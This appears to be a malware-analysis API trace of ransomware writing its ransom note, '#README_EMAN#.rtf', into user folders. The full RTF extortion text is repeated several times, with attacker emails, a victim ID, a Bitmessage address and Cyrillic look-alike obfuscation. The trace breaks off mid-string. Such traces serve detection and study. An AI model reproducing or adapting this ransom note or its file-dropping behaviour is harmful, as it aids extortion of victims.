10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.335] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.336] CloseHandle (hObject=0x294) returned 1 [0273.336] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0273.336] GetLastError () returned 0x2 [0273.336] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 